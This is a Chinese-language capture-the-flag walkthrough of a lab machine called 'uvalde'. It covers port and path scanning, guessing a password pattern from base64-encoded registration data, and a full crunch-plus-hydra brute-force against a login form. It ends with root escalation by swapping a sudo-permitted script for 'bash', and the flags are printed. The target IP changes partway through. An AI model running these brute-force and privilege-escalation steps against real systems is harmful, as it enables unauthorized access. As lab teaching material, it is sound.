信息搜集
arp-scan -l端口扫描
──(root㉿kali)-[~]
└─# nmap -sV -p- -Pn 192.168.56.63
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-29 04:47 EDT
Nmap scan report for 192.168.56.63
Host is up (0.00067s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
80/tcp open http Apache httpd 2.4.54 ((Debian))
MAC Address: 08:00:27:37:15:C4 (Oracle VirtualBox virtual NIC)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.24 seconds
路径扫描
/img (Status: 301) [Size: 312] [--> http://192.168.56.63/img/]
/login.php (Status: 200) [Size: 1022]
/user.php (Status: 302) [Size: 0] [--> login.php]
/mail (Status: 301) [Size: 313] [--> http://192.168.56.63/mail/]
/css (Status: 301) [Size: 312] [--> http://192.168.56.63/css/]
/js (Status: 301) [Size: 311] [--> http://192.168.56.63/js/]
/success.php (Status: 302) [Size: 0] [--> login.php]
/vendor (Status: 301) [Size: 315] [--> http://192.168.56.63/vendor/]
/index.php (Status: 200) [Size: 29604]
/create_account.php (Status: 200) [Size: 1003]
Progress: 244929 / 244932 (100.00%)
我们访问/create.php是随便登录,抓包,响应包文件头发现一个location,里面存放一个base64:
┌──(root㉿kali)-[~]
└─# base64 -d 8.txt
username=123456&password=1234562024@8979
会发现,没每次注册抓包后,会有base64的解码都会有特征
usename=xxxx&password=xxxxx2024@四位随机数通过这个我们来爆破matthew用户的密码
首先生成字典:
crunch 16 16 -t matthew2024@%%%% -l aaaaaaaaaaa@aaaa > matth.list 然后开始攻击:
然后我就发现,找不到密码,发现wp抓包时2023,但我抓包时2024,我的时间变了,靶机的密码没变,所以说,还得按旧的来,然后我试试利用2023的登录,发现登录成功,才发现在2024的今天,在做靶场已经不行了,很好玩的一件事,只能按照wp的走了。
┌──(root㉿kali)-[~]
└─# hydra -l matthew -P matth.list 192.168.1.10 http-post-form '/login.php:username=matthew&password=^PASS^:<input type="submit" value="Login">'
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-05-03 04:10:16
[DATA] max 16 tasks per 1 server, overall 16 tasks, 10000 login tries (l:1/p:10000), ~625 tries per task
[DATA] attacking http-post-form://192.168.1.10:80/login.php:username=matthew&password=^PASS^:<input type="submit" value="Login">
[80][http-post-form] host: 192.168.1.10 login: matthew password: matthew2023@1554
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-05-03 04:10:41
username=matthew&password=^PASS^:<input type="submit" value="Login">: 是要提交给服务器的表单数据。其中,username=matthew 表示用户名为 "matthew",而 password=^PASS^:<input type="submit" value="Login"> 则表示密码将通过 Hydra 的字典攻击模式来尝试。^PASS^ 是 Hydra 中的一个特殊标记,表示会将密码从字典文件中逐一尝试。拿取shell
ssh登录:matthew2023@1554
matthew@uvalde:~$ cat user.txt
6e4136fbed8f8c691996dbf42697d460
提权
sudo -l 发现一个无命令执行的脚本,可以利用执行,
printf "\n"
printf "${JAUNE}Target $domain ====> PWNED${RESET}\n"
printf "${JAUNE}URL: https://$domain/*********************.php${RESET}\n"
这段脚本看起来是一个简单的仿冒黑客工具的模拟。它首先定义了一些颜色和格式化输出的变量,然后打印了一个 ASCII 艺术字标题,展示了工具名称、作者和版本号。
在脚本的主体部分,它要求用户输入一个域名作为目标,然后模拟了一个"黑客攻击"的过程,实际上只是打印了一个带有进度条的字符串。最后,它输出了一条消息声称目标已经被“PWNED”(黑客术语,表示目标被攻破),并提供了一个假的 URL,以及一个要求支付比特币以解锁“后门”的消息。本身这个代码没什么攻击性,但因为是/bin/bash执行,那么就意味着我们可以伪造一个重名文件,从而执行文件中写入内容,然后执行获取权限
1. matthew@uvalde:/opt$ mv superhack 123
matthew@uvalde:/opt$ ls
123
2. echo "bash" > superhack
3. sudo /bin/bash /opt/superhack
成功拿到rootroot.txt
root@uvalde:~# cat root.txt
59ec54537e98a53691f33e81500f56da
知识点:
- 通过自己注册用户,发现共同点来找用户的密码,是个新奇的方法
- 如果你将 “bash” 写入一个文件并以 sudo 执行,它实际上会启动一个新的 Bash Shell 进程,并执行该文件中的命令。这并不会直接提升权限,除非该文件中包含了特权提升的命令,比如使用
sudo或者执行具有特权的命令。利用这个方法,以超级用户的权限创建一个新的shell,获得root的shell。